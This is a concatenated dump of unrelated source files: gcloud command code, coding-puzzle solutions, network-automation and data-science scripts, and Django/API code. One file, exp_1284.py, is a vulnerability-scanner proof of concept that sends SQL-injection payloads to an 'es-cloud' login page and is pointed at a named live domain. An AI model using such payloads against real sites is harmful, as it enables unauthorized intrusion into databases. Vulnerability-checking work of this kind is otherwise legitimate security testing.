# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for creating interconnects."""
from __future__ import absolute_import
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute.interconnects.attachments import client
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import parser_errors
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute.interconnects import flags as interconnect_flags
from googlecloudsdk.command_lib.compute.interconnects.attachments import flags as attachment_flags
from googlecloudsdk.command_lib.compute.routers import flags as router_flags
_DEPRECATION_WARNING = """\
`create` is deprecated. Please use `gcloud compute interconnects attachments dedicated create` instead.
"""
_DEPRECATION_ERROR = """\
`create` has been removed. Please use `gcloud compute interconnects attachments dedicated create` instead.
"""
# TODO(b/79153388): Clean up this command flag after 3 months of deprecation.
@base.Deprecate(
is_removed=False, warning=_DEPRECATION_WARNING, error=_DEPRECATION_ERROR)
class Create(base.CreateCommand):
"""Create a Google Compute Engine interconnect attachment.
*{command}* is used to create interconnect attachments. An interconnect
attachment is what binds the underlying connectivity of an Interconnect to a
path into and out of the customer's cloud network.
"""
INTERCONNECT_ATTACHMENT_ARG = None
INTERCONNECT_ARG = None
ROUTER_ARG = None
@classmethod
def Args(cls, parser):
cls.INTERCONNECT_ARG = (
interconnect_flags.InterconnectArgumentForOtherResource(
'The interconnect for the interconnect attachment'))
cls.INTERCONNECT_ARG.AddArgument(parser)
cls.ROUTER_ARG = router_flags.RouterArgumentForOtherResources()
cls.ROUTER_ARG.AddArgument(parser)
cls.INTERCONNECT_ATTACHMENT_ARG = (
attachment_flags.InterconnectAttachmentArgument())
cls.INTERCONNECT_ATTACHMENT_ARG.AddArgument(parser, operation_type='create')
parser.add_argument(
'--description',
help='An optional, textual description for the '
'interconnect attachment.')
parser.display_info.AddCacheUpdater(
interconnect_flags.InterconnectsCompleter)
def Run(self, args):
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
attachment_ref = self.INTERCONNECT_ATTACHMENT_ARG.ResolveAsResource(
args,
holder.resources,
scope_lister=compute_flags.GetDefaultScopeLister(holder.client))
interconnect_attachment = client.InterconnectAttachment(
attachment_ref, compute_client=holder.client)
interconnect_ref = None
if args.interconnect is not None:
interconnect_ref = self.INTERCONNECT_ARG.ResolveAsResource(
args, holder.resources)
if args.router_region is None:
args.router_region = attachment_ref.region
if args.router_region != attachment_ref.region:
raise parser_errors.ArgumentException(
'router-region must be same as the attachment region.')
router_ref = None
if args.router is not None:
router_ref = self.ROUTER_ARG.ResolveAsResource(args, holder.resources)
return interconnect_attachment.Create(
description=args.description,
interconnect=interconnect_ref,
router=router_ref)
|
[
"me@gareth.codes"
] |
me@gareth.codes
|
c901c352d59c3fdf81e492c184b2a45cfa2bb28d
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_1284.py
|
1429903641e7e8e932e605922ac8a2efe0393840
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453
| 2017-06-15T02:55:24
| 2017-06-15T02:55:24
| 94,495,007
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,294
|
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2010-0107850
def assign(service, arg):
if service == "es-cloud":
return True, arg
def audit(arg):
payloads = ['Easy/Login.aspx','Easy/Login2.aspx']
postdata = {
payloads[0] : '__VIEWSTATE=/wEPDwUKMTMyNjA3OTI4OGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2xvZ2luc3VibWl0&txtHostName=%27%20and%20db_name%281%29%3E1--&txtUserName=&txtUserPwd=&loginsubmit.x=41&loginsubmit.y=25',
payloads[1] :'__VIEWSTATE=/wEPDwULLTEzNDYxNTQ5ODZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQtsb2dpbnN1Ym1pdA==&txtHostName1=&txtUserName1=&txtUserPwd1=&txtHostName=%27%20and%20db_name%281%29%3E1--&txtUserName=&txtUserPwd=&loginsubmit.x=108&loginsubmit.y=26'
}
for payload in payloads:
url = arg + payload
code, head, res, errcode1, _ = curl.curl2(url,postdata[payload])
if code == 500 and 'master' in res :
security_hole(arg+payload)
if __name__ == '__main__':
from dummy import *
audit(assign('es-cloud','http://leaders56.com/')[1])
|
[
"liyueke@huobi.com"
] |
liyueke@huobi.com
|
9eb74cca9dec2cbb7c5746ec54fe8569c56b695c
|
fdafd2ef8a26a3e9ee6a4016ec6272516d64168f
|
/zeta_python/2504.py
|
72047ecde7f6205654a68ab7ecb7680a2175d6b7
|
[] |
no_license
|
yenru0/CodeObjecct
|
322d669d9e70b7202e5e527cda27da0b1e8f273d
|
b9d5260b973d7435c089c49bc8867be5d2be4d85
|
refs/heads/master
| 2021-06-28T06:13:57.978205
| 2021-03-13T00:47:53
| 2021-03-13T00:47:53
| 221,762,665
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,041
|
py
|
"""
2504: 괄호의 값
문제:
4개의 기호 ‘(’, ‘)’, ‘[’, ‘]’를 이용해서 만들어지는 괄호열 중에서 올바른 괄호열이란 다음과 같이 정의된다.
1. 한 쌍의 괄호로만 이루어진 ‘()’와 ‘[]’는 올바른 괄호열이다.
2. 만일 X가 올바른 괄호열이면 ‘(X)’이나 ‘[X]’도 모두 올바른 괄호열이 된다.
3. X와 Y 모두 올바른 괄호열이라면 이들을 결합한 XY도 올바른 괄호열이 된다.
예를 들어 ‘(()[[]])’나 ‘(())[][]’ 는 올바른 괄호열이지만 ‘([)]’ 나 ‘(()()[]’ 은 모두 올바른 괄호열이 아니다.
우리는 어떤 올바른 괄호열 X에 대하여 그 괄호열의 값(괄호값)을 아래와 같이 정의하고 값(X)로 표시한다.
1. ‘()’ 인 괄호열의 값은 2이다.
2. ‘[]’ 인 괄호열의 값은 3이다.
3. ‘(X)’ 의 괄호값은 2×값(X) 으로 계산된다.
4. ‘[X]’ 의 괄호값은 3×값(X) 으로 계산된다.
5. 올바른 괄호열 X와 Y가 결합된 XY의 괄호값은 값(XY)= 값(X)+값(Y) 로 계산된다.
예를 들어 ‘(()[[]])([])’ 의 괄호값을 구해보자. ‘()[[]]’ 의 괄호값이 2 + 3×3=11 이므로 ‘(()[[ ]])’의 괄호값은 2×11=22 이다.
그리고 ‘([])’의 값은 2×3=6 이므로 전체 괄호열의 값은 22 + 6 = 28 이다.
여러분이 풀어야 할 문제는 주어진 괄호열을 읽고 그 괄호값을 앞에서 정의한대로 계산하여 출력하는 것이다.
입력:
첫째 줄에 괄호열을 나타내는 문자열(스트링)이 주어진다. 단 그 길이는 1 이상, 30 이하이다.
출력:
첫째 줄에 그 괄호열의 값을 나타내는 정수를 출력한다. 만일 입력이 올바르지 못한 괄호열이면 반드시 0을 출력해야 한다.
"""
"""
TC1:
Input:
(()[[]])([])
Output:
28
"""
import re
Input = input()
par_regex = re.compile(r'\((.*?)\)')
t = par_regex.search(Input)
print(t.groups())
|
[
"yenru0604@gmail.com"
] |
yenru0604@gmail.com
|
8ddfbddd68a31c3d35868308a43e364033aab43e
|
26f6313772161851b3b28b32a4f8d255499b3974
|
/Python/PathCrossing.py
|
c22cf8f8b0dbf1ea31c2839c19c406d996aa76b8
|
[] |
no_license
|
here0009/LeetCode
|
693e634a3096d929e5c842c5c5b989fa388e0fcd
|
f96a2273c6831a8035e1adacfa452f73c599ae16
|
refs/heads/master
| 2023-06-30T19:07:23.645941
| 2021-07-31T03:38:51
| 2021-07-31T03:38:51
| 266,287,834
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,294
|
py
|
"""
Given a string path, where path[i] = 'N', 'S', 'E' or 'W', each representing moving one unit north, south, east, or west, respectively. You start at the origin (0, 0) on a 2D plane and walk on the path specified by path.
Return True if the path crosses itself at any point, that is, if at any time you are on a location you've previously visited. Return False otherwise.
Example 1:
Input: path = "NES"
Output: false
Explanation: Notice that the path doesn't cross any point more than once.
Example 2:
Input: path = "NESWW"
Output: true
Explanation: Notice that the path visits the origin twice.
Constraints:
1 <= path.length <= 10^4
path will only consist of characters in {'N', 'S', 'E', 'W}
"""
class Solution:
def isPathCrossing(self, path: str) -> bool:
direction_dict = {'N':(0,1), 'S':(0,-1), 'E':(1,0), 'W':(-1,0)}
visited = set()
pos = [0, 0]
visited.add(tuple(pos))
for d in path:
di,dj = direction_dict[d]
pos[0], pos[1] = pos[0] + di, pos[1] + dj
t_pos = tuple(pos)
if t_pos in visited:
return True
visited.add(t_pos)
return False
S = Solution()
path = "NES"
print(S.isPathCrossing(path))
path = "NESWW"
print(S.isPathCrossing(path))
|
[
"here0009@163.com"
] |
here0009@163.com
|
58311bff281c8ef4d985364018cccc1599e69c6b
|
fb2325de1317bed91edb428b5a5a3dad518fa8f2
|
/python-scripts/tqdm_examples/3_tqdm_two_progress_bars.py
|
3bb9c5f6faea3fd6c5990f581c06c8b6ea2aa9d5
|
[] |
no_license
|
gridl/python-ansible-experiments
|
3b22d32db97bc55fd728ad513eb4176c3aae3482
|
d7595804aa9c58f2efc92a5bf8d57faccc61cac6
|
refs/heads/master
| 2020-07-02T07:00:52.876940
| 2019-08-01T16:00:25
| 2019-08-01T16:00:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,375
|
py
|
from concurrent.futures import ThreadPoolExecutor, as_completed
from pprint import pprint
import yaml
import tqdm
from netmiko import ConnectHandler
def conn_ssh_threads(function, devices, command, limit=3, progress_bar=True):
result_dict = {}
with ThreadPoolExecutor(max_workers=limit) as executor:
future_ssh = [executor.submit(function, device, command)
for device in devices]
done_tasks = as_completed(future_ssh)
if progress_bar:
success_bar = tqdm.tqdm(total=len(devices), desc='Correct'.rjust(10))
done_tasks = tqdm.tqdm(done_tasks, total=len(devices), desc='All'.rjust(10))
for task in done_tasks:
task_ok, result = task.result()
if task_ok:
success_bar.update(1)
result_dict.update(result)
success_bar.close()
return result_dict
def send_show_command(device, show_command):
result = {}
with ConnectHandler(**device) as ssh:
ssh.enable()
result[device['ip']] = ssh.send_command(show_command)
if device['ip'] == '192.168.100.1':
return False, result
else:
return True, result
if __name__ == '__main__':
with open('devices.yaml') as f:
devices = yaml.load(f)
results = conn_ssh_threads(send_show_command, devices, 'sh ip int br')
print()
|
[
"nataliya.samoylenko@gmail.com"
] |
nataliya.samoylenko@gmail.com
|
5ef6d164bee4bc70549b4ddbf316067cfc70872f
|
5de328dace679cd32b2d32725832b8f75b2dbc11
|
/utils/plot_modularity_statistics.py
|
8b58be30e8bd1bf7c81b7b2e4952dfcb15b37afc
|
[] |
no_license
|
hag007/emp_evaluation
|
94230b4bdb296d27237fa3de4d0b9e83ea3ee897
|
52ac70f4593a97bd4a62174d5e58cc5c84ee2820
|
refs/heads/master
| 2021-06-13T21:28:41.609495
| 2020-09-10T09:27:23
| 2020-09-10T09:27:23
| 254,448,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,230
|
py
|
import sys
sys.path.insert(0, "../")
import numpy as np
import matplotlib.pyplot as plt
import os
import constants
with open(os.path.join(constants.OUTPUT_GLOBAL_DIR, "modularity_statistics.txt")) as f:
n_modules = [int(a) for a in f.readline().strip()[1:-1].split(', ')]
n_large_modules = [int(a) for a in f.readline().strip()[1:-1].split(', ')]
modularity_scores = [float(a) for a in f.readline().strip()[1:-1].split(', ')]
prev=0
for i, cur_score in enumerate(modularity_scores):
if cur_score<prev:
stop=i
plt.subplots(figsize=(20,17))
plt.cla()
plt.plot(np.arange(len(n_modules)), n_modules, label="n_modules")
plt.plot(np.arange(len(n_large_modules)), n_large_modules, label="n_large_modules")
plt.plot(np.arange(len(modularity_scores)), [a for a in modularity_scores], label="modularity_scores")
for i, a in enumerate(modularity_scores):
plt.annotate("{}/{}".format(n_large_modules[i], n_modules[i]), (i,a))
plt.xlabel("iteration")
plt.ylabel("modularity score")
plt.title("Newman-Girvan modularity curve\nin DIP network")
plt.legend()
plt.savefig(os.path.join(constants.OUTPUT_GLOBAL_DIR, "modularity_statistics.png"))
|
[
"hagai.levi.007@gmail.com"
] |
hagai.levi.007@gmail.com
|
97ebd726684ddf767f28ab2bfd0e5e12f98afaa4
|
037e55864b1d7db7db05f23261d3a008df8878b1
|
/rebench/tests/features/issue_32_jmh_support_test.py
|
58768f9e7e5427d58e4492f1a06e24f30b9bb8e7
|
[
"MIT"
] |
permissive
|
mmtk/ReBench
|
3d5f95edd8b3ef592db6c8b20d4a6bb404e615ed
|
709e6f0a1be6fd7bf4b4d13d057f040254a3991b
|
refs/heads/master
| 2022-12-18T23:58:11.944800
| 2020-08-11T12:39:31
| 2020-08-11T12:39:31
| 292,157,028
| 0
| 0
|
MIT
| 2020-09-02T02:21:17
| 2020-09-02T02:21:16
| null |
UTF-8
|
Python
| false
| false
| 2,018
|
py
|
# Copyright (c) 2009-2014 Stefan Marr <http://www.stefan-marr.de/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from os.path import dirname, realpath
from unittest import TestCase
from ...interop.jmh_adapter import JMHAdapter
class Issue32JMHSupport(TestCase):
"""
Add support for JMH, a Java benchmarking harness.
"""
def setUp(self):
self._path = dirname(realpath(__file__))
with open(self._path + "/issue_32_jmh.data") as data_file:
self._data = data_file.read()
def test_parsing(self):
adapter = JMHAdapter(False)
data_points = adapter.parse_data(self._data, None, 1)
self.assertEqual(4 * 20, len(data_points))
for i in range(0, 60):
self.assertAlmostEqual(830000, data_points[i].get_total_value(),
delta=60000)
for i in range(60, 80):
self.assertAlmostEqual(86510, data_points[i].get_total_value(),
delta=4000)
|
[
"git@stefan-marr.de"
] |
git@stefan-marr.de
|
5781fff7ad852f1351497e6d1a8ff523c8de95b7
|
018a1d8d59c00f69b0489ce05567a2972c335ff7
|
/2017_May23/generators/for_implementation.py
|
713eb216a4145dbfd4067b77ea9dded1f02454a9
|
[] |
no_license
|
singhujjwal/python
|
f0127b604e2204a02836c95d89ee4903f760d48c
|
4fb4b34a318f093bd944cd70d7f0d69dd7dfef6e
|
refs/heads/master
| 2021-09-20T15:35:13.389400
| 2021-09-03T06:39:58
| 2021-09-03T06:39:58
| 92,157,309
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 363
|
py
|
a = [10, 20, 30, 40, 50]
#for i in a:
# print i,
length = len(a)
iterator = iter(a)
while length:
i = iterator.next()
# Body of for loop
print i,
length -= 1
# -----------------------------
iterator = iter(a)
try:
while True:
i = iterator.next()
# Body of 'for' loop
print i,
except StopIteration: pass
|
[
"ujjsingh@cisco.com"
] |
ujjsingh@cisco.com
|
a21976098d397a872b65179026a16e0c985a6ddf
|
eb2668b93899637f04e4c93e01063d0c8175ccde
|
/Stock_prices/Polimetall/Polimetall_stock_price_LSTM.py
|
dba94543d4d0d4a5cb22d9943bd63d902f40b0a3
|
[] |
no_license
|
D-Katt/AI-Machine-Learning
|
aad1fe1c8f3f901cb7829919d1b69a106f0ddfab
|
1868c92366dccabf8c86c559eee640645b51bb51
|
refs/heads/master
| 2021-12-19T21:59:04.403188
| 2021-12-07T13:07:46
| 2021-12-07T13:07:46
| 235,104,866
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,253
|
py
|
"""Model predicts next day's stock price for Polymetall metal company
based on the close price for previous periods. Univariate LSTM model.
Data source: https://www.finam.ru/profile/moex-akcii/polymetal-international-plc/export/
"""
import pandas as pd
import numpy as np
import datetime
from sklearn.preprocessing import MinMaxScaler
import tensorflow as tf
import matplotlib.pyplot as plt
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
# Plots display settings
plt.rcParams['figure.figsize'] = 12, 8
plt.rcParams.update({'font.size': 14})
FILE_PATH = 'POLY_stock_price.csv'
# Tensorflow settings
EPOCHS = 1000
PATIENCE = 5
BATCH_SIZE = 64
LOOKBACK = 3
SAMPLING_RATE = 1
STRIDE = 1
# --------------------------- Functions -----------------------------
def get_data(path: str) -> pd.DataFrame:
"""Function loads stock prices from a local file.
:param path: Path to a csv file
:return: DataFrame with close price column and datetime index
"""
parser = lambda x: datetime.datetime.strptime(x, '%Y%m%d')
df = pd.read_csv(path, usecols=['<CLOSE>', '<DATE>'],
index_col='<DATE>', date_parser=parser)
display_data(df)
return df
def display_data(df: pd.DataFrame):
"""Function displays a chart with historical prices.
:param df: 1-column DataFrame with prices and datetime index
"""
plt.plot(df)
plt.title('Stock Price')
plt.ylabel('Rubles')
plt.savefig('prices.png')
plt.show()
def plot_history(hist):
"""Function plots a chart with training and validation metrics.
:param hist: Tensorflow history object from model.fit()
"""
# Losses
mae = hist.history['loss']
val_mae = hist.history['val_loss']
# Epochs to plot along x axis
x_axis = range(1, len(mae) + 1)
plt.plot(x_axis, mae, 'bo', label='Training')
plt.plot(x_axis, val_mae, 'ro', label='Validation')
plt.title('Mean Squared Error')
plt.ylabel('Loss (MSE)')
plt.xlabel('Epochs')
plt.legend()
plt.tight_layout()
plt.savefig('uni_training.png')
plt.show()
# ------------------------ Data processing --------------------------
# Historical data
data = get_data(FILE_PATH)
# Scale numeric data to the range between 0 and 1
scaler = MinMaxScaler()
data_scaled = scaler.fit_transform(np.array(data).reshape(-1, 1))
# Create iterables containing stock prices and corresponding next day's prices
input_features = data_scaled[:-1, :]
targets = data_scaled[1:, :]
# Leave latest periods for test and validation purposes
train_data = input_features[:-120]
val_data = input_features[-120:-50]
test_data = input_features[-50:]
train_targets = targets[:-120]
val_targets = targets[-120:-50]
test_targets = targets[-50:]
print(f'Dataset shape: {data.shape}')
print(f'Train data: {train_data.shape}')
print(f'Validation data: {val_data.shape}')
print(f'Test data: {test_data.shape}')
# Create tensorflow dataset objects
train_ds = tf.keras.preprocessing.sequence.TimeseriesGenerator(
train_data, train_targets,
length=LOOKBACK, sampling_rate=SAMPLING_RATE,
stride=STRIDE, shuffle=True,
batch_size=BATCH_SIZE
)
val_ds = tf.keras.preprocessing.sequence.TimeseriesGenerator(
val_data, val_targets,
length=LOOKBACK, sampling_rate=SAMPLING_RATE,
stride=STRIDE, shuffle=False,
batch_size=BATCH_SIZE
)
test_ds = tf.keras.preprocessing.sequence.TimeseriesGenerator(
test_data, test_targets,
length=LOOKBACK, sampling_rate=SAMPLING_RATE,
stride=STRIDE, shuffle=False,
batch_size=BATCH_SIZE
)
# -------------------------------- Model -----------------------------------
# Neural network with Long Short-Term Memory layers
model = tf.keras.models.Sequential(
[
tf.keras.layers.LSTM(4, recurrent_dropout=0.15, return_sequences=True,
input_shape=(LOOKBACK, 1)),
tf.keras.layers.LSTM(4, recurrent_dropout=0.15, return_sequences=False),
tf.keras.layers.Dense(1)
]
)
model.compile(optimizer='adam', loss='mse',
metrics=[tf.keras.metrics.MeanAbsolutePercentageError()])
model.summary()
# Train the model until validation accuracy stops improving
early_stop = tf.keras.callbacks.EarlyStopping(
monitor='val_loss', patience=PATIENCE, restore_best_weights=True
)
history = model.fit(train_ds,
epochs=EPOCHS,
verbose=2,
validation_data=val_ds,
callbacks=[early_stop])
plot_history(history)
# Evaluate the model on the test set
test_loss, test_mape = model.evaluate(test_ds)
print(f'MSE loss on test data: {test_loss}\nMAPE: {test_mape}')
# Forecasts for validation and test periods
pred_val = model.predict(val_ds)
pred_val = scaler.inverse_transform(pred_val)
pred_test = model.predict(test_ds)
pred_test = scaler.inverse_transform(pred_test)
# Visualize forecast vs. actual prices
plt.plot(data[-150:], label='Actual data')
plt.plot(data[-120+LOOKBACK-1:-50-1].index, pred_val.ravel(), label='Validation forecast')
plt.plot(data[-50+LOOKBACK-1:-1].index, pred_test.ravel(), label='Test forecast')
plt.ylabel('Rubles')
plt.title('Stock Price')
plt.legend()
plt.savefig('uni_forecast.png')
plt.show()
|
[
"noreply@github.com"
] |
D-Katt.noreply@github.com
|
f1428f69f24ccc83805630ac7b8aa0c3d0a03709
|
1285703d35b5a37734e40121cd660e9c1a73b076
|
/codility/lesson_dp.py
|
75630e274ca92cb387134bb84a03666605defdcd
|
[] |
no_license
|
takin6/algorithm-practice
|
21826c711f57131108168775f08e4e13d07a3b38
|
f4098bea2085a77d11c29e1593b3cc3f579c24aa
|
refs/heads/master
| 2022-11-30T09:40:58.083766
| 2020-08-07T22:07:46
| 2020-08-07T22:07:46
| 283,609,862
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,728
|
py
|
# val(A,S) = sum( abs( [ A[i]*S[i] for i in range(N)] ))
# A = [1,5,2,-2]
# # S = {-1,1-1,1}
# S = [-1,1,-1,1]
# N = len(A)
# for i in range(N):
# print(A[i]*S[i])
# (Assume that the sum of zero elements equals zero.)
def solution(A):
A = [ abs(i) for i in A ]
N = len(A)
dp = [ [float("inf")]*(N+1) for _ in range(2)]
dp[0][0], dp[1][0] = 0, 0
# i = 0 (-1), 1(1)
# dp[i][j]
for i in range(1, N+1):
dp[0][i] = min( abs( (A[i-1] * -1) + dp[0][i-1] ), abs( (A[i-1] * -1) + dp[1][i-1] ) )
dp[1][i] = min( abs( A[i-1] + dp[0][i-1] ), abs( A[i-1] + dp[1][i-1] ) )
# for i in range(1, N+1):
# if abs((A[i-1] * -1) + dp[0][i-1]) > abs((A[i-1] * -1) + dp[1][i-1]):
# dp[0][i] = (A[i-1] * -1) + dp[1][i-1]
# else:
# dp[0][i] = (A[i-1] * -1) + dp[0][i-1]
# if abs(A[i-1] + dp[0][i-1]) > abs(A[i-1] + dp[1][i-1] ):
# dp[1][i] = A[i-1] + dp[1][i-1]
# else:
# dp[1][i] = A[i-1] + dp[0][i-1]
print(dp)
return min(abs(dp[0][-1]), abs(dp[1][-1]))
def solution(A):
N = len(A)
M = 0
for i in range(N):
A[i] = abs(A[i])
M = max(A[i], M)
S = sum(A)
count = [0] * (M+1)
for i in range(N):
count[A[i]] += 1
dp = [-1] * (S+1)
dp[0] = 0
for a in range(1, M+1):
if count[a] > 0:
for j in range(S):
if dp[j] >= 0:
dp[j] = count[a]
elif j >= a and dp[j-1] > 0:
dp[j] = dp[j-a] - 1
print(dp)
result = S
for i in range(S//2+1):
if dp[i] >= 0:
result = min(result, S-2*i)
return result
print(solution([1,5,2,-2]))
print(solution([1,5,2,-3]))
|
[
"takayukiinoue116@gmail.com"
] |
takayukiinoue116@gmail.com
|
dff75fc51048521dd1ee7a43e1493fde50e29379
|
58937468e368e87ff8683ba481e1d42a0fd56422
|
/government/serializers/__init__.py
|
605fa9d9ae7cc6b55415319886e1c4c33ef25446
|
[
"MIT"
] |
permissive
|
The-Politico/politico-civic-government
|
8da45c490eda094bb136a8e3d3b954daebcef617
|
623baf95e1b029c3bbfccf300cdfca630f4969f8
|
refs/heads/master
| 2022-12-11T12:37:46.837216
| 2019-01-04T19:33:19
| 2019-01-04T19:33:19
| 116,028,686
| 0
| 0
|
MIT
| 2022-10-18T18:31:26
| 2018-01-02T15:21:27
|
Python
|
UTF-8
|
Python
| false
| false
| 169
|
py
|
# flake8: noqa
from .body import BodySerializer
from .office import OfficeSerializer
from .jurisdiction import JurisdictionSerializer
from .party import PartySerializer
|
[
"jmcclure@politico.com"
] |
jmcclure@politico.com
|
b86910e27df29df8ecc51ae23afdae872eb46631
|
4ca008a67bc91383255d2a1919b46556ef50622e
|
/support/main/migrations/0004_auto_20190306_1409.py
|
224c992f35c9222f20476e4d70b9f373a840169f
|
[] |
no_license
|
zdimon/support-ionic-django
|
8dc649fc13f3d67f0982ed8b5a796f4e443a60fc
|
f6c096cfa99bb1f6cdb2bf94af2865b02f8e7c75
|
refs/heads/master
| 2023-02-08T04:23:28.990129
| 2021-10-07T05:56:43
| 2021-10-07T05:56:43
| 244,316,789
| 0
| 0
| null | 2023-01-24T01:31:40
| 2020-03-02T08:21:35
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 539
|
py
|
# Generated by Django 2.1.7 on 2019-03-06 14:09
from django.db import migrations
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('main', '0003_auto_20190306_1403'),
]
operations = [
migrations.RemoveField(
model_name='digest',
name='value',
),
migrations.AddField(
model_name='digest',
name='content',
field=tinymce.models.HTMLField(default=''),
preserve_default=False,
),
]
|
[
"zdimon@example.com"
] |
zdimon@example.com
|
f33f82dad957ad77c9c30ba73d16dbacfdfd33f1
|
dc8a337ea1d8a285577d33e5cfd4dbbe846ee1a0
|
/src/main/scala/MaximumAverageSubtree.py
|
a398eb6c8e7364ea2a69c3d5df160e65f8b0b9f4
|
[] |
no_license
|
joestalker1/leetcode
|
8a5cdda17abd33c3eef859732f75d7bec77a9d0e
|
ae392ddbc7eb56cb814b9e9715043c98a89a6314
|
refs/heads/master
| 2023-04-13T22:09:54.407864
| 2023-04-09T19:22:54
| 2023-04-09T19:22:54
| 131,803,943
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 752
|
py
|
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def maximumAverageSubtree(self, root):
if not root:
return 0
def find_avg(node):
if not node:
return [0, 0, 0] #count,sum, avg
left_count,left_sum,left_avg = find_avg(node.left)
right_count,right_sum,right_avg = find_avg(node.right)
count = 1 + left_count + right_count
sum_node = node.val + left_sum + right_sum
avg = sum_node / count
max_avg = max(avg, left_avg, right_avg)
return [count, sum_node, max_avg]
return find_avg(root)[2]
|
[
"stalker.comp@gmail.com"
] |
stalker.comp@gmail.com
|
acb7e479c8659db7cf8998b68023fe7856a6a3eb
|
4c3e992678341ccaa1d4d14e97dac2e0682026d1
|
/addons/website_crm/__manifest__.py
|
25c3c8c27c1aaa7be1c4bea195297a66d7694d84
|
[] |
no_license
|
gahan-corporation/wyatt
|
3a6add8f8f815bd26643e1e7c81aea024945130d
|
77e56da362bec56f13bf0abc9f8cf13e98461111
|
refs/heads/master
| 2021-09-03T18:56:15.726392
| 2018-01-08T02:54:47
| 2018-01-08T02:54:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 529
|
py
|
{
'name': 'Contact Form',
'category': 'Website',
'sequence': 54,
'website': 'https://www.gerp.com/page/website-builder',
'summary': 'Create Leads From Contact Form',
'version': '2.0',
'description': "",
'depends': ['website_form', 'website_partner', 'crm'],
'data': [
'data/website_crm_data.xml',
'views/website_crm_templates.xml',
'views/res_config_settings_views.xml',
],
'qweb': ['static/src/xml/*.xml'],
'installable': True,
'auto_install': True,
}
|
[
"duchess@gahan-corporation.com"
] |
duchess@gahan-corporation.com
|
f71fa3008085e80be37a7aacd30689da78448a15
|
60e26e2c6e1fe185f0af2065cb4fd4d6d506504e
|
/engine/multimedia/api_view.py
|
3ab0699cd607fc493fb62d36e931b581326efe44
|
[
"BSD-3-Clause"
] |
permissive
|
NamoxLabs/BlogEngine
|
4887df1078e4b15bc44c51b9b8c2d8b1e8a6aca4
|
741549e78b58bbc857e9dcecd88034de49d73304
|
refs/heads/master
| 2023-05-12T08:38:36.811094
| 2020-12-10T01:36:59
| 2020-12-10T01:36:59
| 155,762,174
| 1
| 2
|
BSD-3-Clause
| 2023-04-29T18:53:41
| 2018-11-01T19:00:48
|
Python
|
UTF-8
|
Python
| false
| false
| 3,159
|
py
|
from rest_framework import generics, permissions, renderers, viewsets, authentication
from rest_framework.views import APIView
from rest_framework.parsers import MultiPartParser, FormParser
from rest_framework.decorators import api_view, action
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework_jwt.settings import api_settings
from engine.multimedia.models import MultimediaUser as MulUserModel, MultimediaCategory as MulCatModel,\
MultimediaSubategory as MulSubCModel, MultimediaPost as MulPostModel
from .serializers import MulUserSerializer, MulCatSerializer,\
MulSubCSerializer, MulPostSerializer
from engine.utils import get_request_token, get_user_token
jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
@api_view(['GET'])
def api_root(request, format=None):
return Response({
'multimedia': reverse('multimedia-list', request=request, format=format),
})
class MultimediaHandler(APIView):
#authentication_classes = (authentication.JSONWebTokenAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
#permission_classes = (permissions.IsAdminUser,)
def post(self, request, format=None):
print("request.FILES")
print(request.FILES)
request.FILES
#serializer = UserAvatarSerializer(files=request.FILES)
#print("serializer")
#print(serializer)
if serializer.is_valid():
print("funca")
serializer.save()
return Response(serializer.data)
"""
class MultimediaHandler(viewsets.ModelViewSet):
